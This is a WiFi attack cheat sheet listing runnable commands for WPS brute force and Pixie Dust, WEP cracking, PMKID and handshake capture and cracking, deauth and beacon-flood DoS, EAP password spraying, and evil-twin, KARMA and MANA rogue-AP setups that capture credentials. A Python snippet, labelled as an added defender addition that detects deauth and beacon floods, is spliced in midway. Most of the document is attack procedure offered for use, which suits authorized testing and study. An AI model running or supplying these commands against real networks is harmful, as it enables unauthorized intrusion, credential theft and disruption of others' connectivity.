
Basic WiFi Commands

ip link show                          # List available interfaces
airmon-ng check kill                  # Kill interfering processes
airmon-ng start wlan0                 # Enable monitor mode
airmon-ng stop wlan0mon               # Disable monitor mode
airodump-ng wlan0mon                  # Scan 2.4 GHz networks
airodump-ng wlan0mon --band a         # Scan 5 GHz networks
airodump-ng wlan0mon --wps            # Show WPS-enabled APs
iw dev wlan0 scan | grep "^BSS\|SSID\|WPA" # Quick scan summary

Essential Tools

Airgeddon

All-in-one bash script covering WEP, WPA-PSK, WPS, Evil Twin, and Enterprise attacks with a guided menu.
docker run --rm -ti --name airgeddon \
  --net=host --privileged -p 3000:3000 \
  v1s1t0r1sh3r3/airgeddon

EAPHammer

Focused on WPA-Enterprise attacks, EAP downgrade, and credential capture.
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

Wifite2

Automates WPS/WEP/WPA-PSK attacks: sets monitor mode, scans, selects targets, and runs appropriate attacks.

wifiphisher

Performs Evil Twin, KARMA, and Known Beacons attacks combined with phishing templates to capture PSKs or portal credentials.

WPS Attacks

WPS (Wi-Fi Protected Setup) uses an 8-digit PIN validated in two halves, giving only ~11,000 effective combinations.

WPS Brute Force

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

WPS Pixie Dust Attack

Some APs use predictable nonces (E-S1, E-S2), making the WPS PIN recoverable offline:
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

# Without monitor mode
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null PIN Attack

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

WEP

WEP is broken due to the tiny 24-bit IV space, RC4 keystream reuse, and unkeyed CRC32 integrity. A practical break:
# Collect IVs
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon

# Speed up with ARP replay
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon

# Crack with PTW attack
aircrack-ng wep_capture-01.cap

WPA/WPA2 PSK

PMKID Attack (No Client Needed)

Capture a single EAPOL frame from the AP — no connected client required:
airmon-ng check kill && airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git && cd hcxdumptool && make && make install
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1

# Convert and crack
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt

WPA Handshake Capture

# Monitor the target AP
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

# Force re-authentication via deauth
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0

# Crack the captured handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

WPA Enterprise (MGT)

EAP Authentication Methods

EAP-MD5: Sends the MD5 hash of the password. Not recommended: vulnerable to dictionary attacks and provides no server authentication.
EAP-TLS: Uses both client-side and server-side certificates. Strong when certificates are properly managed.
PEAP (PEAP-MSCHAPv2): Creates a TLS tunnel, then authenticates via MSCHAPv2 inside it. The most common enterprise method; the MSCHAPv2 challenge/response can be captured and cracked.
EAP-TTLS: Provides mutual authentication through an encrypted tunnel. Only server-side certificates are required; the client authenticates with credentials.

Username Capture

Even with PEAP-EAP-TLS, usernames are sent in plaintext in the EAP “Response Identity” message:
# Capture auth with airodump + wireshark, then filter:
# Display filter: eapol
# Look for "Response, Identity" packet

Enterprise Evil Twin

# Generate certificates
./eaphammer --cert-wizard

# Launch EAP Evil Twin
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

EAP Brute-Force (Password Spray)

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

./eaphammer --eap-spray \
  --interface-pool wlan0 wlan1 \
  --essid example-wifi \
  --password bananas \
  --user-list users.txt

DoS Attacks

# Deauthentication attack (aireplay-ng)
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

# Beacon flooding (create fake APs)
mdk4 wlan0mon b -a -w nta -m

# EAPOL flooding
mdk4 wlan0mon e -t EF:60:69:D7:69:2F
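As an added defender-side illustration (not part of the original cheat sheet), a toy WIDS heuristic that flags the deauthentication and beacon floods above from a constructed list of 802.11 management-frame records; the thresholds, field names and sample frames are assumptions:

```python
# Toy WIDS heuristics for two DoS techniques: a deauth flood (spoofed
# deauth/disassoc frames using the real AP's address) and a beacon flood
# (many never-before-seen BSSIDs appearing at once). Frame records are
# constructed for this example; thresholds are assumed, tune per site.
from collections import Counter

DEAUTH_PER_SEC = 20      # assumed: deauth/disassoc frames per BSSID per 1 s bucket
NEW_BSSIDS_PER_SEC = 15  # assumed: never-seen BSSIDs per 1 s bucket


def detect_deauth_flood(frames, threshold=DEAUTH_PER_SEC):
    """Return the BSSIDs that sent >= threshold deauth/disassoc frames in any
    1-second bucket. A flagged BSSID is the address being spoofed, i.e. the
    AP under attack; 802.11w (PMF) makes these frames unforgeable."""
    buckets = Counter()
    for f in frames:
        if f["subtype"] in ("deauth", "disassoc"):
            buckets[(f["bssid"], int(f["ts"]))] += 1
    return {bssid for (bssid, _), n in buckets.items() if n >= threshold}


def detect_beacon_flood(frames, threshold=NEW_BSSIDS_PER_SEC):
    """Return the 1-second buckets in which >= threshold new BSSIDs first
    beaconed; a legitimate environment adds new APs far more slowly."""
    seen, new_per_sec = set(), Counter()
    for f in frames:
        if f["subtype"] == "beacon" and f["bssid"] not in seen:
            seen.add(f["bssid"])
            new_per_sec[int(f["ts"])] += 1
    return sorted(sec for sec, n in new_per_sec.items() if n >= threshold)


def sample_frames():
    """Constructed capture: one real AP beaconing, one routine deauth,
    a beacon flood in second 1 and a deauth flood in second 2."""
    ap = "AA:BB:CC:00:00:01"  # constructed address
    frames = [{"ts": i / 10, "subtype": "beacon", "bssid": ap} for i in range(30)]
    frames.append({"ts": 0.5, "subtype": "deauth", "bssid": ap})  # client leaving
    for i in range(25):  # 25 fake APs appear within second 1
        frames.append({"ts": 1.0 + i / 30, "subtype": "beacon",
                       "bssid": f"02:00:00:00:00:{i:02x}"})
    for i in range(40):  # 40 spoofed deauths within second 2
        frames.append({"ts": 2.0 + i / 50, "subtype": "deauth", "bssid": ap})
    return frames


if __name__ == "__main__":
    print("deauth flood from:", detect_deauth_flood(sample_frames()))
    print("beacon flood in seconds:", detect_beacon_flood(sample_frames()))
```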

Evil Twin & Rogue AP Attacks

1. Open Evil Twin

airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
Useful for capturing captive portal credentials and performing LAN attacks on connected clients.
2. WPA/WPA2 Evil Twin

Lure clients with a matching SSID and WPA2. Without the PSK the 4-way handshake will not complete, but you can capture it for cracking.
./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
3. Enterprise Evil Twin

Downgrade authentication to capture credentials:
./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

KARMA, MANA, and Known Beacons

Attack           Description
KARMA            Rogue AP responds to all probe requests, tricking devices into connecting
MANA             Captures PNLs from broadcast probes and responds with known SSIDs
Loud MANA        Broadcasts responses for all ESSIDs seen in nearby devices' PNLs
Known Beacons    Brute-forces an ESSID list, responding to any name in a wordlist

# MANA attack
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt

# Known Beacons
./eaphammer -i wlan0 --mana --known-beacons --known-ssids-file wordlist.txt
